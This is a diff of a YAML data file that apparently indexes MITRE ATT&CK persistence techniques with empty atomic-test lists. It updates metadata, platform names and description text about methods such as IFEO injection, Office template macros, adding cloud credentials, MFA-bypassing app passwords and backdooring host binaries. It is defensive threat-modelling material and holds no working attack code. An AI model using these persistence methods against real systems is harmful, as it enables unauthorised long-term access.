       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.004
     atomic_tests: []
   T1098.004:
@@ -31315,7 +31729,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.004
     atomic_tests: []
   T1546.012:
@@ -31369,7 +31782,7 @@ persistence:
         description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
           18, 2017.
         source_name: Symantec Ushedix June 2008
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.112Z'
       name: 'Event Triggered Execution: Image File Execution Options Injection'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g  notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -31402,8 +31815,6 @@ persistence:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.012
     atomic_tests: []
   T1574.005:
@@ -31434,7 +31845,7 @@ persistence:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -31469,12 +31880,10 @@ persistence:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:18.602Z'
       name: 'Event Triggered Execution: Accessibility Features'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -31551,7 +31960,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.008
     atomic_tests: []
   T1136.002:
@@ -31605,7 +32013,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.002
     atomic_tests: []
   T1542.002:
@@ -31637,7 +32044,7 @@ persistence:
           health and make sure it's not already dying on you. Retrieved October 2,
           2018.
         source_name: ITWorld Hard Disk Health Dec 2014
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-01T20:43:55.632Z'
       name: Component Firmware
       description: |-
         Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -31667,55 +32074,10 @@ persistence:
       - SYSTEM
       x_mitre_system_requirements:
       - Ability to update component device firmware from the host operating system.
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1137.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
-      type: attack-pattern
-      created: '2019-11-07T20:29:17.788Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.001
-        url: https://attack.mitre.org/techniques/T1137/001
-      - url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
-        description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
-          Retrieved July 3, 2017.
-        source_name: Microsoft Change Normal Template
-      - url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
-        description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
-          Retrieved July 3, 2017.
-        source_name: MSDN VBA in Office
-      - url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
-        description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
-          Retrieved July 3, 2017.
-        source_name: enigma0x3 normal.dotm
-      - url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
-        description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
-          Retrieved July 3, 2017.
-        source_name: Hexacorn Office Template Macros
-      - source_name: GlobalDotName Jun 2019
-        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
-        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
-          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
-      - source_name: CrowdStrike Outlook Forms
-        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
-        description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
-          Movement and Persistence. Retrieved February 5, 2019.
-      - source_name: Outlook Today Home Page
-        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
-        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
-          Retrieved February 5, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:01:35.918Z'
       name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
@@ -31746,6 +32108,7 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: 'Many Office-related persistence mechanisms require changes
         to the Registry and for binaries, files, or scripts to be written to disk
         or existing files modified to include malicious scripts. Collect events related
@@ -31755,9 +32118,13 @@ persistence:
         also be investigated since the base templates should likely not contain VBA
         macros. Changes to the Office macro security settings should also be investigated.(Citation:
         GlobalDotName Jun 2019)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -31765,11 +32132,47 @@ persistence:
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
+      created: '2019-11-07T20:29:17.788Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/001
+        external_id: T1137.001
+      - source_name: MSDN VBA in Office
+        description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
+          Retrieved July 3, 2017.
+        url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
+      - source_name: Hexacorn Office Template Macros
+        description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
+          Retrieved July 3, 2017.
+        url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
+      - source_name: Microsoft Change Normal Template
+        description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
+          Retrieved July 3, 2017.
+        url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
+      - source_name: enigma0x3 normal.dotm
+        description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
+          Retrieved July 3, 2017.
+        url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
+      - source_name: CrowdStrike Outlook Forms
+        description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
+          Movement and Persistence. Retrieved February 5, 2019.
+        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+      - source_name: GlobalDotName Jun 2019
+        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+      - source_name: Outlook Today Home Page
+        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+          Retrieved February 5, 2019.
+        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.001
     atomic_tests: []
   T1546.009:
@@ -31801,7 +32204,7 @@ persistence:
         description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
           Retrieved December 18, 2017.
         source_name: Sysinternals AppCertDlls Oct 2007
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.052Z'
       name: 'Event Triggered Execution: AppCert DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -31849,13 +32252,11 @@ persistence:
       x_mitre_effective_permissions:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.009
     atomic_tests: []
   T1098.005:
     technique:
-      modified: '2023-10-03T17:38:39.065Z'
+      modified: '2024-09-25T20:39:53.597Z'
       name: Device Registration
       description: "Adversaries may register a device to an adversary-controlled account.
         Devices may be registered in a multifactor authentication (MFA) system, which
@@ -31868,16 +32269,16 @@ persistence:
         FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
         only a username and password to enroll the account's first device or to enroll
         a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
-        an adversary with existing access to a network may register a device to Azure
-        AD and/or its device management system, Microsoft Intune, in order to access
+        an adversary with existing access to a network may register a device to Entra
+        ID and/or its device management system, Microsoft Intune, in order to access
         sensitive data or resources while bypassing conditional access policies.(Citation:
         AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
-        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
         be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
         campaigns via intra-organizational emails, which are less likely to be treated
         as suspicious by the email client.(Citation: Microsoft - Device Registration)
         Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
-        on an Azure AD tenant by registering a large number of devices.(Citation:
+        on an Entra ID tenant by registering a large number of devices.(Citation:
         AADInternals - BPRT)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -31889,16 +32290,16 @@ persistence:
       - Mike Moran
       - Joe Gumke, U.S. Bank
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
       - Windows
-      - SaaS
-      x_mitre_version: '1.2'
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Active Directory: Active Directory Object Creation'
@@ -31953,7 +32354,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1542:
     technique:
@@ -32014,7 +32414,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.015:
     technique:
@@ -32090,7 +32489,7 @@ persistence:
         url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
         description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
           5, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T16:36:37.042Z'
       name: 'Boot or Logon Autostart Execution: Login Items'
       description: |-
         Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.
@@ -32118,8 +32517,6 @@ persistence:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.015
     atomic_tests: []
   T1205.001:
@@ -32145,7 +32542,7 @@ persistence:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -32170,23 +32567,21 @@ persistence:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1098.001:
     technique:
-      modified: '2024-02-28T14:35:00.862Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Credentials'
       description: "Adversaries may add adversary-controlled credentials to a cloud
         account to maintain persistent access to victim accounts and instances within
         the environment.\n\nFor example, adversaries may add credentials for Service
         Principals and Applications in addition to existing legitimate credentials
-        in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
-        Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
-        both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
-        With sufficient permissions, there are a variety of ways to add credentials
-        including the Azure Portal, Azure command line interface, and Azure or Az
-        PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+        in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+        Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+        include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+        Guidance) With sufficient permissions, there are a variety of ways to add
+        credentials including the Azure Portal, Azure command line interface, and
+        Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
         infrastructure-as-a-service (IaaS) environments, after gaining access through
         [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
         may generate or import their own SSH keys using either the <code>CreateKeyPair</code>
@@ -32196,11 +32591,15 @@ persistence:
         usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
         Expel Behind the Scenes)\n\nAdversaries may also use the <code>CreateAccessKey</code>
         API in AWS or the <code>gcloud iam service-accounts keys create</code> command
-        in GCP to add access keys to an account. If the target account has different
-        permissions from the requesting account, the adversary may also be able to
-        escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+        in GCP to add access keys to an account. Alternatively, they may use the <code>CreateLoginProfile</code>
+        API in AWS to add a password that can be used to log into the AWS Management
+        Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+        Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+        If the target account has different permissions from the requesting account,
+        the adversary may also be able to escalate their privileges in the environment
+        (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
         Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
-        2.0) For example, in Azure AD environments, an adversary with the Application
+        2.0) For example, in Entra ID environments, an adversary with the Application
         Administrator role can add a new set of credentials to their application's
         service principal. In doing so the adversary would be able to access the service
         principal’s roles and permissions, which may be different from those of the
@@ -32211,12 +32610,19 @@ persistence:
         tied to the permissions of the original user account. These temporary credentials
         may remain valid for the duration of their lifetime even if the original account’s
         API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
-        Persistence)"
+        Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+        adversaries may be able to add an app password to a user account.(Citation:
+        Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+        legacy devices that do not support multi-factor authentication (MFA), adding
+        an app password can allow an adversary to bypass MFA requirements. Additionally,
+        app passwords may remain valid even if the user’s primary password is reset.(Citation:
+        Microsoft Entra ID App Passwords)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Expel
       - Oleg Kolesnikov, Securonix
@@ -32225,6 +32631,7 @@ persistence:
       - Alex Soler, AttackIQ
       - Dylan Silva, AWS Security
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -32233,13 +32640,16 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
-      - Azure AD
       - SaaS
-      x_mitre_version: '2.7'
+      - Identity Provider
+      x_mitre_version: '2.8'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
+      - 'Active Directory: Active Directory Object Creation'
+      - 'Active Directory: Active Directory Object Modification'
       type: attack-pattern
       id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
       created: '2020-01-19T16:10:15.008Z'
@@ -32265,10 +32675,18 @@ persistence:
         description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
           Principals. Retrieved January 19, 2020.
         url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+      - source_name: Lacework AI Resource Hijacking 2024
+        description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+          June 6). Lacework Labs. Retrieved July 1, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
       - source_name: GCP SSH Key Add
         description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
           October 1, 2020.
         url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
       - source_name: Blue Cloud of Death Video
         description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
           Azure. Retrieved November 21, 2019.'
@@ -32277,10 +32695,20 @@ persistence:
         description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
           Azure. Retrieved October 23, 2019.'
         url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+      - source_name: Microsoft Entra ID App Passwords
+        description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+          authentication with legacy applications using app passwords. Retrieved May
+          28, 2024.
+        url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
         url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+      - source_name: Mandiant APT42 Operations 2024
+        description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+          Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+          Retrieved May 28, 2024.'
+        url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
       - source_name: Expel Behind the Scenes
         description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
           July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -32297,14 +32725,11 @@ persistence:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.001
     atomic_tests: []
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -32379,7 +32804,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.003:
     technique:
@@ -32468,24 +32892,27 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.003
     atomic_tests: []
   T1554:
     technique:
-      modified: '2024-04-16T13:03:40.824Z'
+      modified: '2024-10-12T16:52:46.067Z'
       name: Compromise Host Software Binary
       description: |-
         Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.
 
-        Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host.
+        Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)
 
         An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)
+
+        After modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       x_mitre_contributors:
       - CrowdStrike Falcon OverWatch
+      - Liran Ravich, CardinalOps
+      - Jamie Williams (U ω U), PANW Unit 42
       x_mitre_deprecated: false
       x_mitre_detection: "Collect and analyze signing certificate metadata and check
         signature validity on software that executes within the environment. Look
@@ -32499,7 +32926,7 @@ persistence:
       - Linux
       - macOS
       - Windows
-      x_mitre_version: '2.0'
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Deletion'
       - 'File: File Modification'
@@ -32514,6 +32941,11 @@ persistence:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1554
         external_id: T1554
+      - source_name: Google Cloud Mandiant UNC3886 2024
+        description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+          Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+          Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+        url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
       - source_name: Unit42 Banking Trojans Hooking 2022
         description: 'Or Chechik. (2022, October 31). Banking Trojan Techniques: How
           Financially Motivated Malware Became Infrastructure. Retrieved September
@@ -32527,11 +32959,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:27:11.065Z'
       name: 'Event Triggered Execution: Change Default File Association'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by a file type association. When a file is opened, the default program
@@ -32557,7 +32988,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Stefan Kanthak
@@ -32571,7 +33001,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -32598,8 +33027,8 @@ persistence:
         url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
       - source_name: Microsoft File Handlers
         description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
-          Retrieved November 13, 2014.
-        url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+          Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
       - source_name: Microsoft Assoc Oct 2017
         description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
           7, 2018.
@@ -32610,7 +33039,8 @@ persistence:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.001
     atomic_tests: []
   T1546.014:
@@ -32651,7 +33081,7 @@ persistence:
         The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
 
         Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T00:16:01.732Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Emond'
       x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -32671,12 +33101,11 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
